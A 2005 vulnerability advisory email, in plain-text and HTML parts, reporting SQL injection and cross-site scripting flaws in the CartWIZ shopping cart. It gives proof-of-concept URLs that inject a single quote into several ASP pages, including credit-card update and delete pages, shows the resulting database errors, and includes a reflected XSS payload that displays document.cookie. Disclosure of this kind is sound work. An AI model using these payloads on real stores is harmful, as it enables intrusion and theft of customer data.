------=_NextPart_001_0019_01C58325.852302E0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Dcrab 's Security Advisory
http://www.dbtech.org
Deadbolt Computer Technologies

******************************
SPECIAL BIRTHDAY RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU =
CAN SEND EMAILS TO DCRAB@HACKERSCENTER.COM
******************************

Get Dcrab's Services to audit your Web servers, scripts, networks, etc =
or even code them. Learn more at http://www.dbtech.org

Severity: High
Title: [Bday Release] Cartwiz shopping cart has multiple Sql injection =
and Cross Site Scripting vulnerabilities
Date: 8/07/2005

Vendor: CartWIZ
Vendor Website: http://www.cartwiz.com/
Vendor Status: Contacted but no reply
Summary: There are, multiple sql injection and cross site scripting =
vulnerabilities in CartWIZ Shopping Cart


Proof of Concept Exploits:=20

www.site.com/cartwiz/store/tellAFriend.asp?idProduct=3D'
SQL INJECTION

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark =
before the character string ''.

/cartwiz/store/tellAFriend.asp, line 71


www.site.com/cartwiz/store/viewSupportTickets.asp?sortType=3D'&sortOrder=3D=
ticketNum&page=3D0
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark =
before the character string ''.

www.site.com/cartwiz/store/viewSupportTickets.asp, line 149


www.site.com/cartwiz/store/updateCreditCards.asp?id=3D'
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark =
before the character string ' and idCustomer=3D1'.

/cartwiz/store/updateCreditCards.asp, line 31


www.site.com/cartwiz/store/deleteCreditCards.asp?id=3D'
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark =
before the character string ''.

www.site.com/cartwiz/store/deleteCreditCards.asp, line 27


www.site.com/cartWiz/store/login.asp?message=3D><script>alert(document.co=
okie);</script>&redirect=3D%2FcartWiz%2Fstore%2FmyAccount%2Easp
Cross Site Scripting


Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah =
and at http://www.hackerscenter.com

Author:=20
These vulnerabilities have been found and released by Diabolic Crab, =
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =
contact me regarding these vulnerabilities. You can find me at, =
http://www.hackerscenter.com or http://www.dbtech.org/. Lookout for my =
soon to come out book on Secure coding with php.

-------------------------------------------------------------------------=
-------

Sincerely,=20
Diabolic Crab=20



------=_NextPart_001_0019_01C58325.852302E0
Content-Type: text/html;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2668" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR><A=20
href=3D"http://www.dbtech.org">http://www.dbtech.org</A><BR>Deadbolt =
Computer=20
Technologies</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial =
size=3D2>******************************<BR>SPECIAL BIRTHDAY=20
RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU CAN SEND EMAILS TO =
<A=20
href=3D"mailto:DCRAB@HACKERSCENTER.COM">DCRAB@HACKERSCENTER.COM</A><BR>**=
****************************</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Get Dcrab's Services to audit your Web =
servers,=20
scripts, networks, etc or even code them. Learn more at <A=20
href=3D"http://www.dbtech.org">http://www.dbtech.org</A></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: [Bday Release] =
Cartwiz=20
shopping cart has multiple Sql injection and Cross Site Scripting=20
vulnerabilities<BR>Date: 8/07/2005</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Vendor: CartWIZ<BR>Vendor Website: <A=20
href=3D"http://www.cartwiz.com/">http://www.cartwiz.com/</A><BR>Vendor =
Status:=20
Contacted but no reply<BR>Summary: There are, multiple sql injection and =
cross=20
site scripting vulnerabilities in CartWIZ Shopping Cart</FONT></DIV>
<DIV>&nbsp;</DIV><FONT face=3DArial size=3D2>
<DIV><BR>Proof of Concept Exploits: </DIV>
<DIV>&nbsp;</DIV>
<DIV><A=20
href=3D"http://www.site.com/cartwiz/store/tellAFriend.asp?idProduct=3D'">=
www.site.com/cartwiz/store/tellAFriend.asp?idProduct=3D'</A><BR>SQL=20
INJECTION</DIV>
<DIV>&nbsp;</DIV>
<DIV>Microsoft OLE DB Provider for ODBC Drivers error '80040e14'</DIV>
<DIV>&nbsp;</DIV>
<DIV>[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation =
mark=20
before the character string ''.</DIV>
<DIV>&nbsp;</DIV>
<DIV>/cartwiz/store/tellAFriend.asp, line 71</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://www.site.com/cartwiz/store/viewSupportTickets.asp?sortType=
=3D'&sortOrder=3DticketNum&page=3D0">www.site.com/cartwiz/store/v=
iewSupportTickets.asp?sortType=3D'&sortOrder=3DticketNum&page=3D0=
</A><BR>SQL=20
INJECTION<BR>Microsoft OLE DB Provider for ODBC Drivers error =
'80040e14'</DIV>
<DIV>&nbsp;</DIV>
<DIV>[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation =
mark=20
before the character string ''.</DIV>
<DIV>&nbsp;</DIV>
<DIV><A=20
href=3D"http://www.site.com/cartwiz/store/viewSupportTickets.asp">www.sit=
e.com/cartwiz/store/viewSupportTickets.asp</A>,=20
line 149</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://www.site.com/cartwiz/store/updateCreditCards.asp?id=3D'">w=
ww.site.com/cartwiz/store/updateCreditCards.asp?id=3D'</A><BR>SQL=20
INJECTION<BR>Microsoft OLE DB Provider for ODBC Drivers error =
'80040e14'</DIV>
<DIV>&nbsp;</DIV>
<DIV>[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation =
mark=20
before the character string ' and idCustomer=3D1'.</DIV>
<DIV>&nbsp;</DIV>
<DIV>/cartwiz/store/updateCreditCards.asp, line 31</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://www.site.com/cartwiz/store/deleteCreditCards.asp?id=3D'">w=
ww.site.com/cartwiz/store/deleteCreditCards.asp?id=3D'</A><BR>SQL=20
INJECTION<BR>Microsoft OLE DB Provider for ODBC Drivers error =
'80040e14'</DIV>
<DIV>&nbsp;</DIV>
<DIV>[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation =
mark=20
before the character string ''.</DIV>
<DIV>&nbsp;</DIV>
<DIV><A=20
href=3D"http://www.site.com/cartwiz/store/deleteCreditCards.asp">www.site=
.com/cartwiz/store/deleteCreditCards.asp</A>,=20
line 27</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://www.site.com/cartWiz/store/login.asp?message=3D><script>al=
ert(document.cookie);</script>&redirect=3D%2FcartWiz%2Fstore%2FmyAcco=
unt%2Easp">www.site.com/cartWiz/store/login.asp?message=3D><script&=
gt;alert(document.cookie);</script>&redirect=3D%2FcartWiz%2Fsto=
re%2FmyAccount%2Easp</A><BR>Cross=20
Site Scripting</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>Keep your self updated, Rss feed at: <A=20
href=3D"http://digitalparadox.org/rss.ah">http://digitalparadox.org/rss.a=
h</A> and=20
at <A =
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A></D=
IV>
<DIV>&nbsp;</DIV>
<DIV>Author: <BR>These vulnerabilities have been found and released by =
Diabolic=20
Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel =
free to=20
contact me regarding these vulnerabilities. You can find me at, <A=20
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =
or <A=20
href=3D"http://www.dbtech.org/">http://www.dbtech.org/</A>. Lookout for =
my soon to=20
come out book on Secure coding with php.<BR>
<HR>
<BR>Sincerely, <BR>Diabolic Crab <BR><IMG =
src=3D"http://digitalparadox.org/dc.gif"=20
border=3D0><BR><BR></FONT></DIV></BODY></HTML>

------=_NextPart_001_0019_01C58325.852302E0--